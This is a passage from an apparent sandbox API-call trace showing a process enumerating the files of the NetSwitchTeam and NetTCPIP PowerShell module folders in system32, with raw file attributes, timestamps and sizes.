ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.508] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.508] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.cdxml", cAlternateFileName="")) returned 1 [0177.509] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0177.509] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.cdxml", cAlternateFileName="")) returned 1 [0177.509] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetSwitchTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0177.510] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 1 [0177.510] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam.psd1", cAlternateFileName="")) returned 0 [0177.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.511] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1")) returned 0x20 [0177.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.513] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0177.513] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c [0177.513] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0177.516] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.516] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetCompartment.cdxml", cAlternateFileName="")) returned 1 [0177.516] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPAddress.cdxml", cAlternateFileName="")) returned 1 [0177.517] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6029, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPInterface.cdxml", cAlternateFileName="")) returned 1 [0177.517] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv4Protocol.cdxml", cAlternateFileName="")) returned 1 [0177.517] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv6Protocol.cdxml", cAlternateFileName="")) returned 1 [0177.518] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNeighbor.cdxml", cAlternateFileName="")) returned 1 [0177.518] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x149b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetOffloadGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0177.518] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetPrefixPolicy.cdxml", cAlternateFileName="")) returned 1 [0177.518] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetRoute.cdxml", cAlternateFileName="")) returned 1 [0177.520] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPConnection.cdxml", cAlternateFileName="")) returned 1 [0177.520] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPSetting.cdxml", cAlternateFileName="")) returned 1 [0177.520] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTransportFilter.cdxml", cAlternateFileName="")) returned 1 [0177.520] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPEndpoint.cdxml", cAlternateFileName="")) returned 1 [0177.521] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPSetting.cdxml", cAlternateFileName="")) returned 1 [0177.521] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x393a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPConfiguration.psm1", cAlternateFileName="")) returned 1 [0177.521] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP.psd1", cAlternateFileName="")) returned 1 [0177.521] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11582, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.521] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.521] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 1 [0177.522] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 0 [0177.522] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0177.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.523] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0177.523] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c [0177.523] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.524] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetCompartment.cdxml", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPAddress.cdxml", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6029, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPInterface.cdxml", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv4Protocol.cdxml", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv6Protocol.cdxml", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNeighbor.cdxml", cAlternateFileName="")) returned 1 [0177.525] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x149b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetOffloadGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetPrefixPolicy.cdxml", cAlternateFileName="")) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetRoute.cdxml", cAlternateFileName="")) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPConnection.cdxml", cAlternateFileName="")) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, 